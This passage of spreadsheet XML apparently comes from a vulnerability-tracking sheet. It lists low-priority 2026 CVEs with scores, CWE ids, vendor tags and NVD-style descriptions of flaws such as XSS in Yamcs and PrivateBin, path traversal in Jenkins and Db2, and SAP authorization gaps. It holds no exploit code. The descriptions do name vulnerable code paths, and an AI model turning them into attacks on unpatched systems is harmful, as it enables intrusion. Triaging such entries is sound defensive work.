          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs processes attacker-controlled data from the /ext URL route in yamcs-web/src/main/webapp/projects/webapp/src/app/core/routes/extension.matcher.ts, extension.component.ts, and app.component.ts without checking registered plugin IDs before DOM rendering through innerHTML. A crafted URL can execute JavaScript when opened by a user. The script can read data available to the Yamcs web application and perform actions in the user context. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M2193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55566</t>
        </is>
      </c>
    </row>
    <row r="2194">
      <c r="A2194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55696</t>
        </is>
      </c>
      <c r="C2194" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2194" s="5" t="inlineStr"/>
      <c r="F2194" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2194" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2194" s="5" t="inlineStr"/>
      <c r="I2194" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2194" s="5" t="inlineStr"/>
      <c r="K2194" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="L2194" s="5" t="inlineStr">
        <is>
          <t>PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Prior to 2.0.5, AttachmentViewer.setAttachment in js/privatebin.js uses getAttachmentMimeType to accept attacker-controlled MIME types and uses getBlobUrl to create a same-origin blob before setting attachmentLink's href for the Download attachment link. The SVG-only sanitization branch updates only the preview blob, so text/html, image/svg, application/xhtml+xml, and text/xml attachments can remain active in the download blob. On an instance with fileupload = true and a weakened, stripped, or absent Content Security Policy, an anonymous attacker can create such an attachment, and a victim who opens the link in a new tab causes inline JavaScript to execute in the PrivateBin origin. The script can read origin-scoped local storage and issue same-origin requests, including requests to applications co-hosted on the same domain. This issue is fixed in version 2.0.5.</t>
        </is>
      </c>
      <c r="M2194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55696</t>
        </is>
      </c>
    </row>
    <row r="2195">
      <c r="A2195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55834</t>
        </is>
      </c>
      <c r="C2195" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2195" s="5" t="inlineStr"/>
      <c r="F2195" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2195" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2195" s="5" t="inlineStr"/>
      <c r="I2195" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2195" s="5" t="inlineStr"/>
      <c r="K2195" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2195" s="5" t="inlineStr">
        <is>
          <t>Pocket ID is an OIDC provider that allows users to authenticate with their passkeys to services. From 2.6.0 until 2.9.0, frontend/src/routes/authorize/+page.ts reads the redirect_uri query parameter and frontend/src/routes/authorize/+page.svelte uses the raw callbackURL in redirectWithError when prompt=none cannot complete silent authorization. The client-side path only blocks javascript and data schemes and does not invoke the backend callback allow-list validation, so an unauthenticated attacker who knows a valid client_id can redirect a victim browser to an arbitrary HTTP or HTTPS origin for phishing or OIDC error and state smuggling. This issue is fixed in version 2.9.0.</t>
        </is>
      </c>
      <c r="M2195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55834</t>
        </is>
      </c>
    </row>
    <row r="2196">
      <c r="A2196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61911</t>
        </is>
      </c>
      <c r="C2196" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2196" s="5" t="inlineStr"/>
      <c r="F2196" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2196" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2196" s="5" t="inlineStr"/>
      <c r="I2196" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2196" s="5" t="inlineStr"/>
      <c r="K2196" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L2196" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a Sieve mailbox existence oracle. An authenticated user could install a Sieve script that probed whether another user's private mailbox existed, or read the value of shared mailbox annotations, by observing which fileinto branch fired during LMTP delivery.</t>
        </is>
      </c>
      <c r="M2196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61911</t>
        </is>
      </c>
    </row>
    <row r="2197">
      <c r="A2197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62986</t>
        </is>
      </c>
      <c r="C2197" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2197" s="5" t="inlineStr"/>
      <c r="F2197" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2197" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2197" s="5" t="inlineStr"/>
      <c r="I2197" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2197" s="5" t="inlineStr"/>
      <c r="K2197" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-457, CWE-908</t>
        </is>
      </c>
      <c r="L2197" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13, the PyOpenEXR Python bindings return stale heap data when reading a crafted deep scanline EXR that uses layer-prefixed RGB channels. With the default channel coalescing (separate_channels=False), the wrapper groups channels such as left.R, left.G, and left.B into a single RGB sample array, but the lane-offset calculation in PyPart::setDeepSliceData() only recognizes the exact unprefixed names G, B, and A. As a result, prefixed channels like left.G and left.B are decoded into lane 0 while lanes 1 and 2 are left uninitialized and returned to Python. A Python application that reads untrusted deep EXR files through the default OpenEXR.File API and then logs, serializes, previews, or otherwise processes the resulting NumPy sample arrays may expose uninitialized same-process heap contents, in addition to receiving incorrect green and blue channel data. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M2197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62986</t>
        </is>
      </c>
    </row>
    <row r="2198">
      <c r="A2198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66761</t>
        </is>
      </c>
      <c r="C2198" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2198" s="5" t="inlineStr"/>
      <c r="F2198" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2198" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2198" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I2198" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2198" s="5" t="inlineStr"/>
      <c r="K2198" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2198" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not enforce sufficient flow control in certain functionality. An attacker with low privileges could send high volumes of data without consuming responses, causing unbounded memory growth. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M2198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66761</t>
        </is>
      </c>
    </row>
    <row r="2199">
      <c r="A2199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66775</t>
        </is>
      </c>
      <c r="C2199" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2199" s="5" t="inlineStr"/>
      <c r="F2199" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2199" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2199" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I2199" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2199" s="5" t="inlineStr"/>
      <c r="K2199" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L2199" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not enforce cross-site request forgery protection on the authentication flow by default. An unauthenticated attacker could craft a malicious link and trick a victim into following it. Successful exploitation could allow the attacker to bind the victim's session to an attacker-controlled identity, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M2199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66775</t>
        </is>
      </c>
    </row>
    <row r="2200">
      <c r="A2200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70427</t>
        </is>
      </c>
      <c r="C2200" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2200" s="5" t="inlineStr"/>
      <c r="F2200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2200" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H2200" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I2200" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2200" s="5" t="inlineStr"/>
      <c r="K2200" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2200" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier does not safely handle symbolic links with effectively empty names during the extraction of `.tar` and `.tar.gz` archives, allowing attackers able to control agent processes to provide crafted archives to the controller to write files to arbitrary locations on the file system, restricted only by file system access permissions of the user running Jenkins.</t>
        </is>
      </c>
      <c r="M2200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70427</t>
        </is>
      </c>
    </row>
    <row r="2201">
      <c r="A2201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70428</t>
        </is>
      </c>
      <c r="C2201" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2201" s="5" t="inlineStr"/>
      <c r="F2201" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2201" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H2201" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I2201" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2201" s="5" t="inlineStr"/>
      <c r="K2201" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2201" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier improperly identifies file paths attempting path traversal in file parameter names, allowing attackers with Item/Configure and Item/Build permission to write files to arbitrary locations on the controller file system.</t>
        </is>
      </c>
      <c r="M2201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70428</t>
        </is>
      </c>
    </row>
    <row r="2202">
      <c r="A2202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70596</t>
        </is>
      </c>
      <c r="C2202" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2202" s="5" t="inlineStr"/>
      <c r="F2202" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2202" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2202" s="5" t="inlineStr"/>
      <c r="I2202" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2202" s="5" t="inlineStr"/>
      <c r="K2202" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2202" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 4.9.0 until 6.54.1, an input validation issue allowed any staff user to create a post with content in feature_image_caption that could be used to hijack another staff user's Ghost Admin session, resulting in privilege escalation. This issue is fixed in 6.54.1.</t>
        </is>
      </c>
      <c r="M2202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70596</t>
        </is>
      </c>
    </row>
    <row r="2203">
      <c r="A2203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71322</t>
        </is>
      </c>
      <c r="C2203" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2203" s="5" t="inlineStr"/>
      <c r="F2203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2203" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2203" s="5" t="inlineStr"/>
      <c r="I2203" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2203" s="5" t="inlineStr"/>
      <c r="K2203" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2203" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, CertificateExport placed its CertificatePermission ownership check inside the plugin.requires_key branch for POST /api/1/certificates//export. A plugin declaring requires_key false bypassed that check, and the handler still passed cert.private_key as an argument and recorded a key_view audit event. The bundled JavaTruststoreExportPlugin ignored the key, so the immediate exposure was limited to public certificate material and misleading audit entries, but a future plugin could have consumed the supplied key. The fix passes no private key to plugins that do not require one and confines ownership checks and key_view logging to actual private-key exports. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71322</t>
        </is>
      </c>
    </row>
    <row r="2204">
      <c r="A2204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73019</t>
        </is>
      </c>
      <c r="C2204" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2204" s="5" t="inlineStr"/>
      <c r="F2204" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2204" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2204" s="5" t="inlineStr"/>
      <c r="I2204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2204" s="5" t="inlineStr"/>
      <c r="K2204" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="L2204" s="5" t="inlineStr">
        <is>
          <t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M2204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t>
        </is>
      </c>
    </row>
    <row r="2205">
      <c r="A2205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76962</t>
        </is>
      </c>
      <c r="C2205" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2205" s="5" t="inlineStr"/>
      <c r="F2205" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2205" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2205" s="5" t="inlineStr"/>
      <c r="I2205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2205" s="5" t="inlineStr"/>
      <c r="K2205" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2205" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Manage Bank Chains app) does not perform sufficient authorization checks within certain affected functionality. An attacker with low privileges could send specially crafted requests to delete specific entries that should not be accessible to them. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M2205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t>
        </is>
      </c>
    </row>
    <row r="2206">
      <c r="A2206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76963</t>
        </is>
      </c>
      <c r="C2206" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2206" s="5" t="inlineStr"/>
      <c r="F2206" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2206" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2206" s="5" t="inlineStr"/>
      <c r="I2206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2206" s="5" t="inlineStr"/>
      <c r="K2206" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2206" s="5" t="inlineStr">
        <is>
          <t>Due to a missing authorization check in Application Server ABAP of SAP NetWeaver and ABAP Platform, an authenticated attacker could gain unauthorized access to sensitive system configuration information. Successful exploitation could result in exposure of security relevant settings and internal system details, resulting in low impact on confidentiality while integrity and availability remain unaffected.</t>
        </is>
      </c>
      <c r="M2206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t>
        </is>
      </c>
    </row>
    <row r="2207">
      <c r="A2207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76977</t>
        </is>
      </c>
      <c r="C2207" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2207" s="5" t="inlineStr"/>
      <c r="F2207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2207" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2207" s="5" t="inlineStr"/>
      <c r="I2207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2207" s="5" t="inlineStr"/>
      <c r="K2207" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="L2207" s="5" t="inlineStr">
        <is>
          <t>SAP UI5 does not sufficiently validate the parent frame's origin against the configured allowlist. An unauthenticated attacker could host a malicious page to bypass framing restrictions. If an authenticated victim visits the attacker's page and interacts with it, the attacker could trick the victim into performing unintended actions, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M2207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t>
        </is>
      </c>
    </row>
    <row r="2208">
      <c r="A2208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78516</t>
        </is>
      </c>
      <c r="C2208" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2208" s="5" t="inlineStr"/>
      <c r="F2208" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2208" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H220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208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2208" s="5" t="inlineStr"/>
      <c r="K2208" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2208" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="M2208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t>
        </is>
      </c>
    </row>
    <row r="2209">
      <c r="A2209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78593</t>
        </is>
      </c>
      <c r="C2209" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2209" s="5" t="inlineStr"/>
      <c r="F2209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2209" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H2209" s="5" t="inlineStr"/>
      <c r="I2209" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2209" s="5" t="inlineStr"/>
      <c r="K2209" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2209" s="5" t="inlineStr">
        <is>
          <t>An insufficiently validated configuration field in Kibana's Cribl integration allows an authenticated user holding Kibana Fleet management privileges to inject attacker-controlled expressions into a server-side script template, resulting in an Elasticsearch ingest pipeline being written beyond the caller's authorized Elasticsearch permissions.</t>
        </is>
      </c>
      <c r="M2209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78593</t>
        </is>
      </c>
    </row>
    <row r="2210">
      <c r="A2210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86087</t>
        </is>
      </c>
      <c r="C2210" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2210" s="5" t="inlineStr"/>
      <c r="F2210" s="5" t="inlineStr"/>
      <c r="G2210" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H2210" s="5" t="inlineStr"/>
      <c r="I2210" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2210" s="5" t="inlineStr"/>
      <c r="K2210" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2210" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 could allow an authenticated user to send a specially crafted request to write arbitrary files on the system.</t>
        </is>
      </c>
      <c r="M2210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86087</t>
        </is>
      </c>
    </row>
    <row r="2211">
      <c r="A2211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9736</t>
        </is>
      </c>
      <c r="C2211" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D2211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2211" s="5" t="inlineStr"/>
      <c r="F2211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2211" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2211" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I2211" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2211" s="5" t="inlineStr"/>
      <c r="K2211" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L2211" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 could allow an unauthorized user to inject data into log messages due to improper neutralization of special elements when written to log files.</t>
        </is>
      </c>
      <c r="M2211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9736</t>
        </is>
      </c>
    </row>
    <row r="2212">
      <c r="A2212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0295</t>
        </is>
      </c>
      <c r="C2212" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D2212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2212" s="5" t="inlineStr"/>
      <c r="F2212" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2212" s="5" t="inlineStr">
        <is>
          <t>windows, palo alto</t>
        </is>
      </c>
      <c r="H2212" s="5" t="inlineStr">
        <is>
          <t>paloaltonetworks:globalprotect</t>
        </is>
      </c>
      <c r="I2212" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2212" s="5" t="inlineStr"/>
      <c r="K2212" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2212" s="5" t="inlineStr">
        <is>
          <t>A race condition in the Palo Alto Networks GlobalProtect™ client on macOS enables a locally authenticated low-privileged attacker to escalate their privileges to root.
The GlobalProtect app on Linux, Windows, iOS, Android, and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M2212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0295</t>
        </is>
      </c>
    </row>
    <row r="2213">
      <c r="A2213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63466</t>
        </is>
      </c>
      <c r="C2213" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D2213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2213" s="5" t="inlineStr"/>
      <c r="F2213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2213" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2213" s="5" t="inlineStr"/>
      <c r="I2213" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2213" s="5" t="inlineStr"/>
      <c r="K2213" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L2213" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 8.0.3, FeatureEventFormatterMd.format in src/lib/addons/feature-event-formatter-md.ts assigns Mustache.escape to an identity function before rendering action and path templates. Because Mustache.escape is process-wide, the assignment disables escaping for subsequent Mustache.render calls in email-service.ts, webhook.ts, datadog.ts, and new-relic.ts. An editor-level user can place Slack or Microsoft Teams link syntax in an unrestricted username, trigger a feature event, and inject an attacker-labeled link into a trusted outbound notification channel, while other Mustache sinks remain unescaped until restart. This issue is fixed in version 8.0.3.</t>
        </is>
      </c>
      <c r="M2213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63466</t>
        </is>
      </c>
